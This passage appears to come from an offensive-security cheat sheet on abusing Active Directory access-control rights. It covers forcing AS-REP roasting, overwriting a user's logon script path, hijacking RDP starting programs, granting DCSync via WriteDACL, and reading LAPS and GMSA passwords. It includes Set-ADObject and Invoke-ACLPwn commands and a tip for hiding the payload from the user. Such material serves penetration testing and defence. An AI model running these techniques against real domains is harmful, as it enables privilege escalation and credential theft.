* **GenericAll/GenericWrite** : We can change a victim's **userAccountControl** to not require Kerberos preauthentication, grab the user's crackable AS-REP, and then change the setting back.
* WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the logon script path of the delegate user, which means that the next time, when the user delegate logs on, their system will execute our malicious script : `Set-ADObject -SamAccountName delegate -PropertyName scriptpath -PropertyValue "\\\totallyLegitScript.ps1`
### GenericWrite and Remote Connection Manager
> Now let’s say you are in an Active Directory environment that still actively uses a Windows Server version that has RCM enabled, or that you are able to enable RCM on a compromised RDSH, what can we actually do ? Well each user object in Active Directory has a tab called ‘Environment’.
> This tab includes settings that, among other things, can be used to change what program is started when a user connects over the Remote Desktop Protocol (RDP) to a TS/RDSH in place of the normal graphical environment. The settings in the ‘Starting program’ field basically function like a windows shortcut, allowing you to supply either a local or remote (UNC) path to an executable which is to be started upon connecting to the remote host. During the logon process these values will be queried by the RCM process and run whatever executable is defined. - https://sensepost.com/blog/2020/ace-to-rce/
:warning: The RCM is only active on Terminal Servers/Remote Desktop Session Hosts. The RCM has also been disabled on recent version of Windows (>2016), it requires a registry change to re-enable.
NOTE: To not alert the user the payload should hide its own process window and spawn the normal graphical environment.
## WriteDACL
To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
An attacker can update the owner of the target object. Once the object owner has been changed to a principal the attacker controls, the attacker may manipulate the object any way they see fit. This can be achieved with Set-DomainObjectOwner (PowerView module).
This ACE can be abused for an Immediate Scheduled Task attack, or for adding a user to the local admin group.
## ReadLAPSPassword
An attacker can read the LAPS password of the computer account this ACE applies to. This can be achieved with the Active Directory PowerShell module. Detail of the exploitation can be found in the [Reading LAPS Password](#reading-laps-password) section.
An attacker can read the GMSA password of the account this ACE applies to. This can be achieved with the Active Directory and DSInternals PowerShell modules.
* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/)
* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces)
* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)